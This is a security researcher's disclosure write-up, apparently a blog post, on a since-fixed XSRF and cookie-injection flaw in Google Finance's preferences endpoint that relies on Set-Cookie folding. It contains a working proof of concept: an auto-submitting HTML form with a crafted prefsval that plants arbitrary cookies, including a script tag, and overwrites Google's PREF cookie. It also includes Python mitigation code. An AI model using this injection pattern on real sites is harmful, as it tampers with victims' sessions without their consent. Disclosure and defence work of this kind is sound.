Here I present a (reported and fixed) XSRF and cookie manipulation vulnerability I discovered in google.com, requiring no user interaction. It was possible to set arbitrary cookies and tamper with existing ones.
This works on Safari and other browsers that support setting multiple cookies within the same Set-Cookie header, a technique called Set-Cookie folding.
The behavior is specified in section 4.2.2 of RFC 2109. The RFC says that the Set-Cookie response header comprises the token Set-Cookie:, followed by a comma-separated list of one or more cookies. RFC 2109 was obsoleted by RFC 2965, which in turn was obsoleted by RFC 6265. The most recent specification does not formally forbid Set-Cookie folding, but some browsers (Chrome included) do not support it. So this exploit works for the rest of them.
The bug is a lack of sanitization of the prefsval parameter, which is echoed into a Set-Cookie header in the response. The <PAYLOAD> position allows commas and semicolons, thus allowing injection and cookie manipulation in browsers that support Set-Cookie folding.
A proof-of-concept payload could be the prefsval value used in the steps to reproduce below: it sets the first cookie (called X), terminates it, sets a cookie named USER_CONTROLLED_COOKIE_NAME with content <script>alert('XSS')</script> (totally unescaped), terminates it, and sets another cookie, DUMMY, with the rest of the original, legitimate
It is also possible to set an arbitrary expiration date and path, thus making the cookie valid for google.com/ and not only google.com/finance. No anti-XSRF token was used.
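As an added example (my code, not the original post's or Google's), here is the server-side check that was missing: a Set-Cookie builder that only accepts RFC 6265 cookie-octets in the value and rejects separators in the path, with the PoC prefsval above, URL-decoded, as constructed input. Treating the preference as its own cookie named RV is an assumption made for the demo.

```python
import re
from typing import Optional
from urllib.parse import quote

# RFC 6265 cookie-octet: %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E, i.e.
# printable US-ASCII minus CTLs, space, DQUOTE, comma, semicolon and backslash.
_COOKIE_VALUE = re.compile(r"^[\x21\x23-\x2B\x2D-\x3A\x3C-\x5B\x5D-\x7E]*$")
# RFC 2616 token, which RFC 6265 uses for cookie names.
_COOKIE_NAME = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def is_valid_cookie_value(value: str) -> bool:
    """True only if every character is an RFC 6265 cookie-octet."""
    return _COOKIE_VALUE.match(value) is not None


def encode_cookie_value(raw: str) -> str:
    """Percent-encode arbitrary user input into the cookie-octet alphabet."""
    return quote(raw, safe="")


def build_set_cookie(name: str, value: str, path: str = "/",
                     max_age: Optional[int] = None) -> str:
    """Build a Set-Cookie header value; refuse (rather than strip) anything
    that could terminate the cookie early or inject attributes."""
    if _COOKIE_NAME.match(name) is None:
        raise ValueError(f"bad cookie name: {name!r}")
    if not is_valid_cookie_value(value):
        raise ValueError(f"bad cookie value: {value!r}")
    if any(c in ";," or ord(c) < 0x20 for c in path):
        raise ValueError(f"bad path: {path!r}")
    header = f"{name}={value}; Path={path}"
    if max_age is not None:
        header += f"; Max-Age={int(max_age)}"
    return header


# Constructed for this demo: the prefsval from the PoC page, URL-decoded.
POC_PREFSVAL = (
    "X;, USER_CONTROLLED_COOKIE_NAME=<script>alert('XSS')</script>; path=/;"
    " Max-Age=999999999; domain=.google.ca;, PREF=GOOGLE_COOKIE_CONTENT_CHANGED;"
    " path=/; Max-Age=999999999; domain=.google.ca;,DUMMY="
)


if __name__ == "__main__":
    # Raw payload is rejected; encoded form yields exactly one harmless cookie.
    print(build_set_cookie("RV", encode_cookie_value(POC_PREFSVAL), "/finance"))
```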
Steps to reproduce
- Let the victim, logged in to her Google account, visit this crafted HTML page (line breaks inside the action URL below were an extraction artifact and have been removed; the onload handler uses document.forms[0], since document.forms itself has no submit method):

  <html>
    <body onload="document.forms[0].submit()">
      <form action="http://www.google.ca/finance/prefs?action=set&prefsgroup=global&prefskey=RV&prefsval=X;,%20USER_CONTROLLED_COOKIE_NAME=<script>alert('XSS')</script>;%20path=/;%20Max-Age=999999999;%20domain=.google.ca;,%20PREF=GOOGLE_COOKIE_CONTENT_CHANGED;%20path=/;%20Max-Age=999999999;%20domain=.google.ca;,DUMMY=" method="post">
        <input type="submit" value="Submit">
      </form>
    </body>
  </html>
- The victim now has an arbitrary cookie set (USER_CONTROLLED_COOKIE_NAME) and a Google one (PREF) overwritten.
This vulnerability was fixed in a week. The request now requires an anti-XSRF token and returns HTTP 400 Bad Request if it is missing.
I received a $3133.7 reward and have been listed in the Google Security Hall of Fame for the fourth time.
Thank you, Google Security Team! :)